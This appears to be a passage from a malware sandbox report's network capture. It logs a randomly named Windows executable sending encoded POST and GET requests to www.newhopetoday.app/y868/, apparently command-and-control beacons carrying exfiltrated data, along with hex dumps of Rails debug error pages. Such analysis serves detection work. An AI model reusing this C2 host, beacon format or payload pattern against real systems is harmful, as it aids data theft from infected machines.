                                                                                                                                            Oct 22, 2024 13:27:56.199856997 CEST1236INData Raw: 72 2e 72 62 3a 33 32 38 3a 69 6e 20 60 62 6c 6f 63 6b 20 69 6e 20 72 75 6e 26 23 33 39 3b 3c 2f 61 3e 3c 62 72 3e 3c 61 20 63 6c 61 73 73 3d 22 74 72 61 63 65 2d 66 72 61 6d 65 73 22 20 64 61 74 61 2d 66 72 61 6d 65 2d 69 64 3d 22 31 38 22 20 68
                                                                                                                                            Data Ascii: r.rb:328:in `block in run&#39;</a><br><a class="trace-frames" data-frame-id="18" href="#">puma (4.3.9) lib/puma/thread_pool.rb:134:in `block in spawn_thread&#39;</a><br></code></pre> </div> <script type="text/javascript"> var traceF
                                                                                                                                            Oct 22, 2024 13:27:56.205377102 CEST1236INData Raw: 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 7d 0a 20 20 3c 2f 73 63 72 69 70 74 3e 0a 3c 2f 64 69 76 3e 0a 0a 0a 20 20 20 20 3c 68 32 3e 0a 20 20 20 20 20 20 52 6f 75 74 65 73 0a 20 20 20 20 3c 2f 68 32 3e 0a 0a 20 20 20 20 3c
                                                                                                                                            Data Ascii: } } } </script></div> <h2> Routes </h2> <p> Routes match in priority from top to bottom </p> <table id='route_table' class='route_table'> <thead> <tr> <th>Helper</th> <


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            2192.168.2.549979216.40.34.4180764C:\Program Files (x86)\lbsKAnNXXRCkGovUHbOIgkVZSJXJRCdfGlZZiMElLQijMYPOVpLG\dmQRVBQMPL.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            Oct 22, 2024 13:27:58.043061972 CEST717OUTPOST /y868/ HTTP/1.1
                                                                                                                                            Host: www.newhopetoday.app
                                                                                                                                            Accept: */*
                                                                                                                                            Accept-Language: en-US,en
                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                            Connection: close
                                                                                                                                            Content-Length: 227
                                                                                                                                            Cache-Control: no-cache
                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                            Origin: http://www.newhopetoday.app
                                                                                                                                            Referer: http://www.newhopetoday.app/y868/
                                                                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; LGL33L/V100 Build/LRX21Y) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/38.0.2125.102 Mobile Safari/537.36
                                                                                                                                            Data Raw: 2d 76 34 70 75 4e 3d 79 75 50 75 31 37 5a 49 48 6b 72 55 72 48 71 67 49 38 37 41 62 6b 73 6a 70 74 4d 34 43 43 6b 53 4a 62 6b 64 77 2b 6b 65 4a 74 5a 33 6a 55 54 78 42 66 54 59 78 50 75 75 50 49 47 44 54 4d 35 45 73 33 50 44 2b 6d 64 56 31 72 7a 65 71 4b 6d 62 38 33 7a 56 69 30 76 36 71 79 6d 62 30 2b 66 6b 68 58 52 6c 77 41 5a 4c 52 56 55 47 43 6b 77 41 6b 68 6b 36 35 64 4f 74 59 49 65 73 68 4c 36 67 6d 46 43 38 34 6c 36 49 63 36 2b 74 4a 54 6d 66 76 48 6c 64 57 65 44 56 68 51 2f 6b 2f 38 72 41 33 44 46 32 2b 33 6a 32 67 67 79 69 6c 38 65 68 64 43 57 5a 63 73 73 75 62 42 6f 51 33 41 74 47 62 58 71 69 58 6b 54 4f 47 70 43 53 55 53 7a 54 47 73 48 56 30 30 75 79 2f 33 4f 57
                                                                                                                                            Data Ascii: -v4puN=yuPu17ZIHkrUrHqgI87AbksjptM4CCkSJbkdw+keJtZ3jUTxBfTYxPuuPIGDTM5Es3PD+mdV1rzeqKmb83zVi0v6qymb0+fkhXRlwAZLRVUGCkwAkhk65dOtYIeshL6gmFC84l6Ic6+tJTmfvHldWeDVhQ/k/8rA3DF2+3j2ggyil8ehdCWZcssubBoQ3AtGbXqiXkTOGpCSUSzTGsHV00uy/3OW
                                                                                                                                            Oct 22, 2024 13:27:58.925225019 CEST1236INHTTP/1.1 404 Not Found
                                                                                                                                            content-type: text/html; charset=UTF-8
                                                                                                                                            x-request-id: 5d18c69d-b52f-4fc3-b1ae-01bb60fb5ea6
                                                                                                                                            x-runtime: 0.034907
                                                                                                                                            content-length: 17042
                                                                                                                                            connection: close
                                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 3c 74 69 74 6c 65 3e 41 63 74 69 6f 6e 20 43 6f 6e 74 72 6f 6c 6c 65 72 3a 20 45 78 63 65 70 74 69 6f 6e 20 63 61 75 67 68 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 46 41 46 41 46 41 3b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 33 33 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 62 6f 64 79 2c 20 70 2c 20 6f 6c 2c 20 75 6c 2c 20 74 64 20 7b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 68 65 6c 76 65 74 69 63 61 2c 20 76 65 72 64 61 6e 61 2c 20 61 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 20 20 31 33 70 78 3b 0a 20 20 20 20 20 20 6c 69 6e 65 [TRUNCATED]
                                                                                                                                            Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <title>Action Controller: Exception caught</title> <style> body { background-color: #FAFAFA; color: #333; margin: 0px; } body, p, ol, ul, td { font-family: helvetica, verdana, arial, sans-serif; font-size: 13px; line-height: 18px; } pre { font-size: 11px; white-space: pre-wrap; } pre.box { border: 1px solid #EEE; padding: 10px; margin: 0px; width: 958px; } header { color: #F0F0F0; background: #C52F24; padding: 0.5em 1.5em; } h1 { margin: 0.2em 0; line-height: 1.1em; font-size: 2em; } h2 { color: #C52F24; line-height: 25px; } .details { border: 1px solid #D0D0D0; border-radius: 4px; margin: 1em 0px; display: block; width: 978px; } .summary { padding: 8px 15px; border-bottom: 1px solid #D0D0D0; [TRUNCATED]
                                                                                                                                            Oct 22, 2024 13:27:58.925271988 CEST212INData Raw: 70 72 65 20 7b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 35 70 78 3b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 23 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 62 6f 78 2d 73 69 7a
                                                                                                                                            Data Ascii: pre { margin: 5px; border: none; } #container { box-sizing: border-box; width: 100%; padding: 0 1.5em; } .source * { margin: 0px; padding: 0px; }
                                                                                                                                            Oct 22, 2024 13:27:58.925308943 CEST1236INData Raw: 20 20 20 2e 73 6f 75 72 63 65 20 7b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 44 39 44 39 44 39 3b 0a 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 45 43 45 43 45 43 3b 0a 20 20 20 20 20 20 77 69 64
                                                                                                                                            Data Ascii: .source { border: 1px solid #D9D9D9; background: #ECECEC; width: 978px; } .source pre { padding: 10px 0px; border: none; } .source .data { font-size: 80%; overflow: auto; bac
                                                                                                                                            Oct 22, 2024 13:27:58.925348043 CEST1236INData Raw: 69 74 2d 61 70 70 65 61 72 61 6e 63 65 3a 20 74 65 78 74 66 69 65 6c 64 3b 0a 20 20 7d 0a 0a 20 20 23 72 6f 75 74 65 5f 74 61 62 6c 65 20 74 62 6f 64 79 20 74 72 20 7b 0a 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 31 70 78 20 73 6f
                                                                                                                                            Data Ascii: it-appearance: textfield; } #route_table tbody tr { border-bottom: 1px solid #ddd; } #route_table tbody tr:nth-child(odd) { background: #f2f2f2; } #route_table tbody.exact_matches, #route_table tbody.fuzzy_matches {
                                                                                                                                            Oct 22, 2024 13:27:58.925384045 CEST1236INData Raw: 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 2f 68 65 61 64 65 72 3e 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 3c 68 32 3e 4e 6f 20 72 6f 75 74 65 20 6d 61 74 63 68 65 73 20 5b 50 4f 53 54 5d 20 26 71 75 6f 74 3b 2f 79 38 36
                                                                                                                                            Data Ascii: Error</h1></header><div id="container"> <h2>No route matches [POST] &quot;/y868&quot;</h2> <p><code>Rails.root: /hover-parked</code></p><div id="traces"> <a href="#" onclick="hide(&#39;Framework-Trace&#39;);hide(&#39;Full-Trace&#
                                                                                                                                            Oct 22, 2024 13:27:58.925419092 CEST1236INData Raw: 61 63 65 2d 66 72 61 6d 65 73 22 20 64 61 74 61 2d 66 72 61 6d 65 2d 69 64 3d 22 33 22 20 68 72 65 66 3d 22 23 22 3e 72 61 69 6c 74 69 65 73 20 28 35 2e 32 2e 36 29 20 6c 69 62 2f 72 61 69 6c 73 2f 72 61 63 6b 2f 6c 6f 67 67 65 72 2e 72 62 3a 32
                                                                                                                                            Data Ascii: ace-frames" data-frame-id="3" href="#">railties (5.2.6) lib/rails/rack/logger.rb:28:in `call&#39;</a><br><a class="trace-frames" data-frame-id="4" href="#">actionpack (5.2.6) lib/action_dispatch/middleware/remote_ip.rb:81:in `call&#39;</a><br>
                                                                                                                                            Oct 22, 2024 13:27:58.925451994 CEST1236INData Raw: 72 61 63 6b 2f 73 65 6e 64 66 69 6c 65 2e 72 62 3a 31 31 30 3a 69 6e 20 60 63 61 6c 6c 26 23 33 39 3b 3c 2f 61 3e 3c 62 72 3e 3c 61 20 63 6c 61 73 73 3d 22 74 72 61 63 65 2d 66 72 61 6d 65 73 22 20 64 61 74 61 2d 66 72 61 6d 65 2d 69 64 3d 22 31
                                                                                                                                            Data Ascii: rack/sendfile.rb:110:in `call&#39;</a><br><a class="trace-frames" data-frame-id="13" href="#">railties (5.2.6) lib/rails/engine.rb:524:in `call&#39;</a><br><a class="trace-frames" data-frame-id="14" href="#">puma (4.3.9) lib/puma/configuration
                                                                                                                                            Oct 22, 2024 13:27:58.925487995 CEST1236INData Raw: 67 65 72 2e 72 62 3a 31 35 3a 69 6e 20 60 63 61 6c 6c 5f 61 70 70 26 23 33 39 3b 3c 2f 61 3e 3c 62 72 3e 3c 61 20 63 6c 61 73 73 3d 22 74 72 61 63 65 2d 66 72 61 6d 65 73 22 20 64 61 74 61 2d 66 72 61 6d 65 2d 69 64 3d 22 33 22 20 68 72 65 66 3d
                                                                                                                                            Data Ascii: ger.rb:15:in `call_app&#39;</a><br><a class="trace-frames" data-frame-id="3" href="#">railties (5.2.6) lib/rails/rack/logger.rb:28:in `call&#39;</a><br><a class="trace-frames" data-frame-id="4" href="#">actionpack (5.2.6) lib/action_dispatch/m
                                                                                                                                            Oct 22, 2024 13:27:58.925522089 CEST1236INData Raw: 22 20 64 61 74 61 2d 66 72 61 6d 65 2d 69 64 3d 22 31 32 22 20 68 72 65 66 3d 22 23 22 3e 72 61 63 6b 20 28 32 2e 32 2e 33 29 20 6c 69 62 2f 72 61 63 6b 2f 73 65 6e 64 66 69 6c 65 2e 72 62 3a 31 31 30 3a 69 6e 20 60 63 61 6c 6c 26 23 33 39 3b 3c
                                                                                                                                            Data Ascii: " data-frame-id="12" href="#">rack (2.2.3) lib/rack/sendfile.rb:110:in `call&#39;</a><br><a class="trace-frames" data-frame-id="13" href="#">railties (5.2.6) lib/rails/engine.rb:524:in `call&#39;</a><br><a class="trace-frames" data-frame-id="1
                                                                                                                                            Oct 22, 2024 13:27:58.925554037 CEST36INData Raw: 3b 0a 20 20 20 20 20 20 20 20 76 61 72 20 66 72 61 6d 65 5f 69 64 20 3d 20 74 61 72 67 65 74 2e 64 61 74 61
                                                                                                                                            Data Ascii: ; var frame_id = target.data
                                                                                                                                            Oct 22, 2024 13:27:58.925569057 CEST1236INData Raw: 73 65 74 2e 66 72 61 6d 65 49 64 3b 0a 0a 20 20 20 20 20 20 20 20 69 66 20 28 73 65 6c 65 63 74 65 64 46 72 61 6d 65 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 73 65 6c 65 63 74 65 64 46 72 61 6d 65 2e 63 6c 61 73 73 4e 61 6d 65 20 3d 20 73 65 6c
                                                                                                                                            Data Ascii: set.frameId; if (selectedFrame) { selectedFrame.className = selectedFrame.className.replace("selected", ""); } target.className += " selected"; selectedFrame = target; // Change the extracte


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            3192.168.2.549980216.40.34.4180764C:\Program Files (x86)\lbsKAnNXXRCkGovUHbOIgkVZSJXJRCdfGlZZiMElLQijMYPOVpLG\dmQRVBQMPL.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            Oct 22, 2024 13:28:00.592179060 CEST1734OUTPOST /y868/ HTTP/1.1
                                                                                                                                            Host: www.newhopetoday.app
                                                                                                                                            Accept: */*
                                                                                                                                            Accept-Language: en-US,en
                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                            Connection: close
                                                                                                                                            Content-Length: 1243
                                                                                                                                            Cache-Control: no-cache
                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                            Origin: http://www.newhopetoday.app
                                                                                                                                            Referer: http://www.newhopetoday.app/y868/
                                                                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; LGL33L/V100 Build/LRX21Y) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/38.0.2125.102 Mobile Safari/537.36
                                                                                                                                            Data Raw: 2d 76 34 70 75 4e 3d 79 75 50 75 31 37 5a 49 48 6b 72 55 72 48 71 67 49 38 37 41 62 6b 73 6a 70 74 4d 34 43 43 6b 53 4a 62 6b 64 77 2b 6b 65 4a 74 52 33 69 69 50 78 41 35 62 59 77 50 75 75 54 34 47 47 54 4d 34 42 73 33 6d 49 2b 6d 41 69 31 70 4c 65 77 72 47 62 36 44 66 56 72 30 76 36 69 53 6d 59 36 65 66 31 68 54 30 73 77 45 31 4c 52 56 55 47 43 69 4d 41 6e 30 49 36 2f 64 4f 73 56 59 65 77 6c 4c 36 59 6d 46 4b 47 34 6c 32 32 63 4a 6d 74 4b 79 57 66 74 31 64 64 4b 4f 44 62 69 51 2b 33 2f 38 6e 6c 33 44 4a 36 2b 33 48 4d 67 6e 47 69 68 62 6e 2f 59 41 4f 6e 48 50 49 74 62 6a 63 42 6a 30 52 6b 64 45 47 77 51 44 6a 4b 62 4b 71 4e 58 6c 4c 43 56 4f 4b 5a 33 78 65 63 7a 67 72 5a 35 65 52 54 39 67 56 4b 2b 55 33 6d 52 74 33 42 56 39 73 75 37 52 6a 33 36 68 4e 43 4e 58 61 71 36 43 35 71 33 4d 4f 44 31 74 7a 77 68 49 38 67 4a 50 64 7a 54 46 64 48 34 57 4b 4e 42 56 31 2b 4c 35 71 35 67 6f 4f 64 64 43 4f 6b 68 51 52 77 53 36 39 72 44 31 51 54 34 58 66 30 6f 7a 6e 6d 51 48 71 41 77 66 51 49 41 6a 39 69 54 43 36 [TRUNCATED]
                                                                                                                                            Data Ascii: -v4puN=yuPu17ZIHkrUrHqgI87AbksjptM4CCkSJbkdw+keJtR3iiPxA5bYwPuuT4GGTM4Bs3mI+mAi1pLewrGb6DfVr0v6iSmY6ef1hT0swE1LRVUGCiMAn0I6/dOsVYewlL6YmFKG4l22cJmtKyWft1ddKODbiQ+3/8nl3DJ6+3HMgnGihbn/YAOnHPItbjcBj0RkdEGwQDjKbKqNXlLCVOKZ3xeczgrZ5eRT9gVK+U3mRt3BV9su7Rj36hNCNXaq6C5q3MOD1tzwhI8gJPdzTFdH4WKNBV1+L5q5goOddCOkhQRwS69rD1QT4Xf0oznmQHqAwfQIAj9iTC6iNyqo1ma/4xil4CHzAQIUop1IAze762C3rcncsdBscRa8nx5xZcrnriawwdq24WaUZSnXzdfhRtbSVHYXopzPLfsaPmrplIJKO7p+EUneynMVJMqKrrLCUiZW1oXCgV3MH1pjveTrUZmzrGzACP/EOQQHUBR4D1TfNhYPLmB20Nk0rLwQhddR9N+WyLxPLMblnX0lxub32dPhXRjgbA0+diFdJeDa6BBPniXSjr1SJEumfdWT4WqhLc1FNgAyyPhdMSzJkDng+wR8omX9bBaC/AaucbV3Jzb1H2mLvOEbsVp0sp7OHG2JRRZuefOTRcMEyYlq0Dmas0L+g25QRENjEOHJib2Y5pKi5Agt7AatsvX6LCkQJQE0h4HCtKXtLwjyJpTF7FWpNrjQ/tigcrbRth6dLEPStIauubzPeoLhNntv1PAvA9ZP/YlyreE0k6hbp6RDPoksWAX6IrGyxW68WmCIBIQXhuHZ4k9Lc++wgdC2iZbAVmvQXEG9WPVfCI9DDsMsI3H2PzO/2DQaJ/GDlyoQk1IPeoGIxWiu8ypsAM3dYi2wrcEbTNYRybgA9GvpbDqI2f8czzK1lmQzCU0+dwlmKw9v1ez/g8dgYEN6Al06rTXOFLA8Elj+Zvk/wNU88wm97HuKFybREhp1V+I+oJIDSuHgVamG0 [TRUNCATED]
                                                                                                                                            Oct 22, 2024 13:28:01.280433893 CEST1236INHTTP/1.1 404 Not Found
                                                                                                                                            content-type: text/html; charset=UTF-8
                                                                                                                                            x-request-id: 76479084-936f-46e8-a604-cf2f4b663d72
                                                                                                                                            x-runtime: 0.033822
                                                                                                                                            content-length: 18058
                                                                                                                                            connection: close
                                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 3c 74 69 74 6c 65 3e 41 63 74 69 6f 6e 20 43 6f 6e 74 72 6f 6c 6c 65 72 3a 20 45 78 63 65 70 74 69 6f 6e 20 63 61 75 67 68 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 46 41 46 41 46 41 3b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 33 33 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 62 6f 64 79 2c 20 70 2c 20 6f 6c 2c 20 75 6c 2c 20 74 64 20 7b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 68 65 6c 76 65 74 69 63 61 2c 20 76 65 72 64 61 6e 61 2c 20 61 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 20 20 31 33 70 78 3b 0a 20 20 20 20 20 20 6c 69 6e 65 [TRUNCATED]
                                                                                                                                            Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <title>Action Controller: Exception caught</title> <style> body { background-color: #FAFAFA; color: #333; margin: 0px; } body, p, ol, ul, td { font-family: helvetica, verdana, arial, sans-serif; font-size: 13px; line-height: 18px; } pre { font-size: 11px; white-space: pre-wrap; } pre.box { border: 1px solid #EEE; padding: 10px; margin: 0px; width: 958px; } header { color: #F0F0F0; background: #C52F24; padding: 0.5em 1.5em; } h1 { margin: 0.2em 0; line-height: 1.1em; font-size: 2em; } h2 { color: #C52F24; line-height: 25px; } .details { border: 1px solid #D0D0D0; border-radius: 4px; margin: 1em 0px; display: block; width: 978px; } .summary { padding: 8px 15px; border-bottom: 1px solid #D0D0D0; [TRUNCATED]
                                                                                                                                            Oct 22, 2024 13:28:01.280462027 CEST1236INData Raw: 70 72 65 20 7b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 35 70 78 3b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 23 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 62 6f 78 2d 73 69 7a
                                                                                                                                            Data Ascii: pre { margin: 5px; border: none; } #container { box-sizing: border-box; width: 100%; padding: 0 1.5em; } .source * { margin: 0px; padding: 0px; } .source { border: 1px
                                                                                                                                            Oct 22, 2024 13:28:01.280478001 CEST1236INData Raw: 0a 20 20 7d 0a 0a 20 20 23 72 6f 75 74 65 5f 74 61 62 6c 65 20 74 68 65 61 64 20 74 72 2e 62 6f 74 74 6f 6d 20 7b 0a 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 6e 6f 6e 65 3b 0a 20 20 7d 0a 0a 20 20 23 72 6f 75 74 65 5f 74 61 62 6c
                                                                                                                                            Data Ascii: } #route_table thead tr.bottom { border-bottom: none; } #route_table thead tr.bottom th { padding: 10px 0; line-height: 15px; } #route_table thead tr.bottom th input#search { -webkit-appearance: textfield; }
                                                                                                                                            Oct 22, 2024 13:28:01.280493021 CEST1236INData Raw: 0a 20 20 20 20 76 61 72 20 74 6f 67 67 6c 65 53 65 73 73 69 6f 6e 44 75 6d 70 20 3d 20 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0a 20 20 20 20 20 20 72 65 74 75 72 6e 20 74 6f 67 67 6c 65 28 27 73 65 73 73 69 6f 6e 5f 64 75 6d 70 27 29 3b 0a 20 20 20
                                                                                                                                            Data Ascii: var toggleSessionDump = function() { return toggle('session_dump'); } var toggleEnvDump = function() { return toggle('env_dump'); } </script></head><body><header> <h1>Routing Error</h1></header><div id="c
                                                                                                                                            Oct 22, 2024 13:28:01.280509949 CEST848INData Raw: 69 6f 6e 5f 64 69 73 70 61 74 63 68 2f 6d 69 64 64 6c 65 77 61 72 65 2f 73 68 6f 77 5f 65 78 63 65 70 74 69 6f 6e 73 2e 72 62 3a 33 33 3a 69 6e 20 60 63 61 6c 6c 26 23 33 39 3b 3c 2f 61 3e 3c 62 72 3e 3c 61 20 63 6c 61 73 73 3d 22 74 72 61 63 65
                                                                                                                                            Data Ascii: ion_dispatch/middleware/show_exceptions.rb:33:in `call&#39;</a><br><a class="trace-frames" data-frame-id="2" href="#">lograge (0.11.2) lib/lograge/rails_ext/rack/logger.rb:15:in `call_app&#39;</a><br><a class="trace-frames" data-frame-id="3" h
                                                                                                                                            Oct 22, 2024 13:28:01.280525923 CEST1236INData Raw: 22 74 72 61 63 65 2d 66 72 61 6d 65 73 22 20 64 61 74 61 2d 66 72 61 6d 65 2d 69 64 3d 22 38 22 20 68 72 65 66 3d 22 23 22 3e 72 61 63 6b 20 28 32 2e 32 2e 33 29 20 6c 69 62 2f 72 61 63 6b 2f 72 75 6e 74 69 6d 65 2e 72 62 3a 32 32 3a 69 6e 20 60
                                                                                                                                            Data Ascii: "trace-frames" data-frame-id="8" href="#">rack (2.2.3) lib/rack/runtime.rb:22:in `call&#39;</a><br><a class="trace-frames" data-frame-id="9" href="#">activesupport (5.2.6) lib/active_support/cache/strategy/local_cache_middleware.rb:29:in `call
                                                                                                                                            Oct 22, 2024 13:28:01.280544043 CEST1236INData Raw: 22 74 72 61 63 65 2d 66 72 61 6d 65 73 22 20 64 61 74 61 2d 66 72 61 6d 65 2d 69 64 3d 22 31 38 22 20 68 72 65 66 3d 22 23 22 3e 70 75 6d 61 20 28 34 2e 33 2e 39 29 20 6c 69 62 2f 70 75 6d 61 2f 74 68 72 65 61 64 5f 70 6f 6f 6c 2e 72 62 3a 31 33
                                                                                                                                            Data Ascii: "trace-frames" data-frame-id="18" href="#">puma (4.3.9) lib/puma/thread_pool.rb:134:in `block in spawn_thread&#39;</a><br></code></pre> </div> <div id="Full-Trace" style="display: none;"> <pre><code><a class="trace-frames" data-f
                                                                                                                                            Oct 22, 2024 13:28:01.280561924 CEST1236INData Raw: 64 5f 6f 76 65 72 72 69 64 65 2e 72 62 3a 32 34 3a 69 6e 20 60 63 61 6c 6c 26 23 33 39 3b 3c 2f 61 3e 3c 62 72 3e 3c 61 20 63 6c 61 73 73 3d 22 74 72 61 63 65 2d 66 72 61 6d 65 73 22 20 64 61 74 61 2d 66 72 61 6d 65 2d 69 64 3d 22 38 22 20 68 72
                                                                                                                                            Data Ascii: d_override.rb:24:in `call&#39;</a><br><a class="trace-frames" data-frame-id="8" href="#">rack (2.2.3) lib/rack/runtime.rb:22:in `call&#39;</a><br><a class="trace-frames" data-frame-id="9" href="#">activesupport (5.2.6) lib/active_support/cache
                                                                                                                                            Oct 22, 2024 13:28:01.281164885 CEST636INData Raw: 72 2e 72 62 3a 33 32 38 3a 69 6e 20 60 62 6c 6f 63 6b 20 69 6e 20 72 75 6e 26 23 33 39 3b 3c 2f 61 3e 3c 62 72 3e 3c 61 20 63 6c 61 73 73 3d 22 74 72 61 63 65 2d 66 72 61 6d 65 73 22 20 64 61 74 61 2d 66 72 61 6d 65 2d 69 64 3d 22 31 38 22 20 68
                                                                                                                                            Data Ascii: r.rb:328:in `block in run&#39;</a><br><a class="trace-frames" data-frame-id="18" href="#">puma (4.3.9) lib/puma/thread_pool.rb:134:in `block in spawn_thread&#39;</a><br></code></pre> </div> <script type="text/javascript"> var traceF
                                                                                                                                            Oct 22, 2024 13:28:01.281183004 CEST1236INData Raw: 73 65 74 2e 66 72 61 6d 65 49 64 3b 0a 0a 20 20 20 20 20 20 20 20 69 66 20 28 73 65 6c 65 63 74 65 64 46 72 61 6d 65 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 73 65 6c 65 63 74 65 64 46 72 61 6d 65 2e 63 6c 61 73 73 4e 61 6d 65 20 3d 20 73 65 6c
                                                                                                                                            Data Ascii: set.frameId; if (selectedFrame) { selectedFrame.className = selectedFrame.className.replace("selected", ""); } target.className += " selected"; selectedFrame = target; // Change the extracte
                                                                                                                                            Oct 22, 2024 13:28:01.286170959 CEST1236INData Raw: 20 20 20 20 20 20 20 3c 69 6e 70 75 74 20 69 64 3d 22 73 65 61 72 63 68 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 50 61 74 68 20 4d 61 74 63 68 22 20 74 79 70 65 3d 22 73 65 61 72 63 68 22 20 6e 61 6d 65 3d 22 70 61 74 68 5b 5d 22 20 2f 3e 0a
                                                                                                                                            Data Ascii: <input id="search" placeholder="Path Match" type="search" name="path[]" /> </th> <th> </th> </tr> </thead> <tbody class='exact_matches' id='exact_matches'> </tbody> <tbody class='fuzzy_matches' id='fuzzy_ma


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            4192.168.2.549981216.40.34.4180764C:\Program Files (x86)\lbsKAnNXXRCkGovUHbOIgkVZSJXJRCdfGlZZiMElLQijMYPOVpLG\dmQRVBQMPL.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            Oct 22, 2024 13:28:03.135566950 CEST434OUTGET /y868/?-v4puN=/snO2OMeD1KGuCX8I8PTb0wPk7oIGCcnJpJV3p53H8t3rhvkFO7Hu8uja/+IWsU7s0a4pmtYzeb4/oul2jeOp0uvryv675HptA9HxwsyIlIOO11NrggPw5LqW5SmsafU0A==&vd=fhUlwfGxBn-tt HTTP/1.1
                                                                                                                                            Host: www.newhopetoday.app
                                                                                                                                            Accept: */*
                                                                                                                                            Accept-Language: en-US,en
                                                                                                                                            Connection: close
                                                                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; LGL33L/V100 Build/LRX21Y) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/38.0.2125.102 Mobile Safari/537.36
                                                                                                                                            Oct 22, 2024 13:28:03.816778898 CEST1236INHTTP/1.1 200 OK
                                                                                                                                            x-frame-options: SAMEORIGIN
                                                                                                                                            x-xss-protection: 1; mode=block
                                                                                                                                            x-content-type-options: nosniff
                                                                                                                                            x-download-options: noopen
                                                                                                                                            x-permitted-cross-domain-policies: none
                                                                                                                                            referrer-policy: strict-origin-when-cross-origin
                                                                                                                                            content-type: text/html; charset=utf-8
                                                                                                                                            etag: W/"489b1cc03742192cd82a546616d2ba37"
                                                                                                                                            cache-control: max-age=0, private, must-revalidate
                                                                                                                                            x-request-id: bf1e3320-74ae-4ff7-8a04-1823199b45ff
                                                                                                                                            x-runtime: 0.006874
                                                                                                                                            transfer-encoding: chunked
                                                                                                                                            connection: close
